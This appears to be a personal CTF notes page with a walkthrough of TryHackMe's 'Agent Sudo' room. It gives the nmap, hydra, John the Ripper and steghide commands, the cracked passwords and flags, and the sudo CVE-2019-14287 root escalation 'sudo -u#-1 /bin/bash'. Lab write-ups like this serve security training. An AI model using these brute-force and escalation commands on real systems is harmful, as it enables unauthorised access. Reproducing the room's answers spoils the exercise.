Try Hack Me
  • Try Hack Me
  • Rooms
  • Tutorial
    • Welcome to TryHackMe
    • Welcome
    • Tutorial
    • Starting Out In Cyber Sec
    • Welcome
  • Capture The Flag
    • Advent of Cyber
      • Task 1 - 10
      • Task 11 - 20
      • Task 21 - 29
      • PDF - materials
    • Anonymous
    • Mnemonic
    • Bounty Hacker
    • Ignite
    • Pickle Rick
    • Simple CTF
    • Agent Sudo
    • Mr. Robot
  • Advent of Cyber II
    • A Christmas Crisis
    • The Elf Strikes Back!
    • Christmas Chaos
    • Santa's watching
    • Someone stole Santa's gift list!
    • Be careful with what you wish on a Christmas night
    • The Grinch Really Did Steal Christmas
    • What's Under the Christmas Tree?
    • Anyone can be Santa!
    • Don't be sElfish!
    • The Rogue Gnome
    • Ready, set, elf.
    • Coal for Christmas
    • Where's Rudolph?
    • There's a Python in my stocking!
    • Help! Where is Santa?
    • ReverseELFneering
    • The Bits of Christmas
    • The Naughty or Nice List
    • PowershELlF to the rescue
    • Time for some ELForensics
    • Elf McEager becomes CyberElf
    • The Grinch strikes again!
    • The Trial Before Christmas
    • Thank You
  • Linux
    • Linux Fundamentals Part 1
    • Linux Fundamentals Part 2
    • Linux Fundamentals Part 3
    • LinuxCTF - Linux Challenges
    • Learn Linux - wip
    • Find - wip
  • Windows
    • Intro to Windows
  • OSINT
    • Introductory Researching - wip
    • Google Dorking
    • OhSINT
    • Sublist3r
    • Searchlight - IMINT
    • Geolocating Images
  • Crypto
    • Hashing - Crypto 101
    • Encryption - Crypto 101
    • CrackTheHash - wip
  • Network
    • Introductory Networking
    • Nmap
    • Network Services - wip
    • Network Services 2 - wip
    • Networking - wip
    • Nmap - wip
    • TOR
  • Web
    • Web Fundamentals
  • Pentest
    • Pentest questionaire
  • Hardware
    • Dumping Router Firmware
  • HELP
  • Reverse
    • Reversing ELF
Powered by GitBook
On this page
  • INIT
  • Task 2 Enumerate
  • How many open ports?
  • How you redirect yourself to a secret page?
  • What is the agent name?
  • Task 3 Hash cracking and brute-force
  • FTP password
  • Zip file password
  • steg password
  • Who is the other agent (in full name)?
  • SSH password
  • Task 4 Capture the user flag
  • What is the user flag?
  • What is the incident of the photo called?
  • Task 5 Privilege escalation
  • CVE number for the escalation
  • What is the root flag?
  • (Bonus) Who is Agent R?

Was this helpful?

  1. Capture The Flag

Agent Sudo

https://tryhackme.com/room/agentsudoctf

PreviousSimple CTFNextMr. Robot

Last updated 4 years ago

Was this helpful?

INIT

export agentsudo=10.10.172.140
ping $agentsudo

echo "10.10.172.140 agentsudo.thm" >> /etc/hosts

Task 2 Enumerate

nmap -v -sC -sV -O -T5 -p1-65535 agentsudo.thm

How many open ports?

3

How you redirect yourself to a secret page?

Switch User-Agent to C

User-Agent

What is the agent name?

Chris

Task 3 Hash cracking and brute-force

FTP password

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://agentsudo.thm -t 50

crystal

Zip file password 

binwalk -e cutie.png

zip2john 8702.zip > ziphash.txt
john ziphash.txt --wordlist=/usr/share/wordlists/rockyou.txt

alien

steg password 

steghide extract -sf cute-alien.jpg

Area51

Who is the other agent (in full name)?

james

SSH password

hackerrules!

Task 4 Capture the user flag

What is the user flag?

b03d975e8c92a7c04146cfa7a5a313c7

What is the incident of the photo called?

scp james@agentsudo.thm:/home/james/Alien_autospy.jpg .

Roswell Alien Autopsy

Task 5 Privilege escalation

sudo -l

CVE number for the escalation

CVE-2019-14287

What is the root flag? 

sudo -u#-1 /bin/bash
cat /root/root.txt

b53a02f55b57d4439e3341834d70c062

(Bonus) Who is Agent R?

DesKel